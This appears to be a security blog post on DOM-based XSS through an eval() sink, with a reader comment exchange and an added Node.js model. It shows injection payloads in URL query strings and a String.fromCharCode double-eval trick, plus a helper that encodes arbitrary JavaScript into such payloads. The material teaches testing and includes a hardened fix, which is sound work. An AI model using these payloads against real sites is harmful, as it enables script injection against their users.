Friday, December 02, 2011

Double eval() for DOM based XSS


DOM-based XSS is becoming relatively common in Web 2.0 and Ajax-driven applications. Such applications frequently use eval() to turn data, some of it taken straight from the URL, into new code and content for the existing DOM. In certain cases it is tricky to pass the right value through for pen-testing and to build an abuse/exploit scenario. Recently, during a consulting engagement, we came across several DOM-based XSS issues where the objective was to get a pop-up to confirm the vulnerability. When the sink is an eval() call, it is possible to eval twice and so convert plain text back into an executable payload.

Here is a simple scenario; real cases can be more complicated. For example, the page contains the following line:

eval('getProduct(' + koko.toString() + ')');

Here “koko” comes from the URL, so it is controlled by the user (in the error messages below it is the pid query parameter of catalog.aspx). Whatever value we pass is concatenated, unquoted, into the string that eval() executes, so it reaches the getProduct() call as code rather than as data.

The test itself is simple. We pass a payload that closes the getProduct() call, ends the statement, appends our own statement and comments out the rest of the script, so the trailing parenthesis appended by the code is ignored. With a plain alert() call in that position we get a simple pop-up, which confirms the DOM-based XSS.

But to prove the point we may want to craft another payload that needs a single quote, for example document.getElementsByName('Login'). That will not work: the quote travels through the URL as %27, which is not decoded before the value reaches eval(), so it raises a syntax error. For simplicity, take alert('hi'); in the scenario above it does not work and we get no pop-up.

We get the following error in the browser:

Error: syntax error
Source File: http://192.168.3.2/catalog.aspx?pid=3%27);elval(alert(%27hi%27));//
Line: 37, Column: 29
Source Code:
getProduct(3%27);elval(alert(%27hi%27));//)

Interestingly, we can leverage a double eval() in this case. Instead of sending alert('hi') with its quotes, we send an eval() of String.fromCharCode() over the decimal character codes of alert('hi') and see what happens.

This avoids the error and we get a pop-up. What we did is simple: String.fromCharCode() is given the decimal codes of the characters of alert('hi'), so the payload contains only letters, digits, commas and parentheses and no quote has to cross the URL. The page's own eval() (the first) executes our statement, String.fromCharCode() rebuilds the text alert('hi'), and our nested eval() (the second) executes that text as code. Hence double eval can come to the rescue when testing DOM-based XSS.

Out of curiosity I searched the web to see whether people use this trick and came across this article - http://blogs.msdn.com/b/infopath/archive/2006/04/05/569338.aspx
Double eval() can also be leveraged for string operations and concatenation.

18 comments:

Jeremy said...

Wouldn't escaping the single tick work too? As in:

http://192.168.3.2/catalog.aspx?pid=3);alert(\'test\');//

shreeraj said...

Nope. It will not work - going through the URL, the browser will not process it. It may work through POST params.

Error: illegal character
Source File: http://192.168.3.2/catalog.aspx?pid=2%27);alert(\%27hi\%27)//
Line: 37, Column: 23
Source Code:
getProduct(2%27);alert(\%27hi\%27)//)
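Worked example, added here and not code from the original post or from the application it describes: a Node.js model of the sink above, eval('getProduct(' + koko.toString() + ')'), fed the raw query value as a page that reads location.search without decoding would see it, so a single quote arrives as the literal text %27 exactly as in the error messages. It reproduces the outcomes discussed on this page: the plain payload runs, the quoted payload and the backslash-escaped variant from the comment exchange both fail with a SyntaxError, and the double-eval payload built from String.fromCharCode() executes. getProduct() and alert() are stubs that only record calls, charCodePayload() and pidValue() are helper names chosen for this example, and hardenedSink() at the end is an added contrast showing the fix: no eval(), the value must be a bare integer and getProduct() is called directly.

```javascript
// Added example, not from the original post. Models the page's sink
//   eval('getProduct(' + koko.toString() + ')');
// where "koko" is the still-percent-encoded pid value, as a page that reads
// location.search without decodeURIComponent() would see it (so a single
// quote arrives as the literal text %27, exactly as in the post's error).
// getProduct() and alert() are stubs that only record what was called.

const calls = [];                                        // what the sink executed
function getProduct(id) { calls.push(['getProduct', id]); }
function alert(msg)     { calls.push(['alert', msg]); }  // stand-in for window.alert

// The vulnerable sink, unchanged from the post. Returns what happened
// instead of letting the SyntaxError escape, so every case can be compared.
function vulnerableSink(koko) {
  calls.length = 0;
  try {
    eval('getProduct(' + koko.toString() + ')');          // direct eval: sees getProduct/alert
    return { ok: true, calls: calls.slice() };
  } catch (e) {
    return { ok: false, error: e.name, calls: calls.slice() };
  }
}

// Encode arbitrary JavaScript as eval(String.fromCharCode(...)). The result
// contains only letters, digits, commas, dots and parentheses, so nothing in
// it is altered by URL encoding and no quote ever has to cross the URL.
function charCodePayload(js) {
  const codes = Array.from(js, ch => ch.charCodeAt(0)).join(',');
  return 'eval(String.fromCharCode(' + codes + '))';
}

// Full pid value: close getProduct(id), run the encoded statement, then
// comment out the trailing ')' that the sink appends.
function pidValue(id, js) {
  return id + ');' + charCodePayload(js) + ';//';
}

// Hardened sink (added contrast, not the page's code): no eval() at all.
// The value must be a bare decimal integer; anything else is rejected.
function hardenedSink(koko) {
  calls.length = 0;
  const raw = String(koko);
  if (!/^\d{1,9}$/.test(raw)) return { ok: false, error: 'rejected', calls: [] };
  getProduct(Number(raw));
  return { ok: true, calls: calls.slice() };
}

// 1. No quote needed: works.
const plain   = vulnerableSink('3);alert(1);//');
// 2. Quotes arrive as %27: SyntaxError (the post's first error).
const quoted  = vulnerableSink('3%27);alert(%27hi%27);//');
// 3. Backslash-escaping the quote (the comment suggestion): still a SyntaxError.
const escaped = vulnerableSink('3%27);alert(\\%27hi\\%27);//');
// 4. Double eval: the sink's eval runs eval(String.fromCharCode(...)),
//    fromCharCode rebuilds "alert('hi')", the inner eval executes it.
const doubled = vulnerableSink(pidValue(3, "alert('hi')"));
// 5. The same payload against the hardened sink is refused outright.
const blocked = hardenedSink(pidValue(3, "alert('hi')"));

console.log({ plain, quoted, escaped, doubled, blocked });
```

Run it with node. Each result object reports whether eval() got through and which stub functions fired. The encoded payload needs only alphanumerics and the characters ( ) , ; / and ., none of which a browser percent-encodes in a query string, which is why it survives the trip through the URL where the quote does not.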
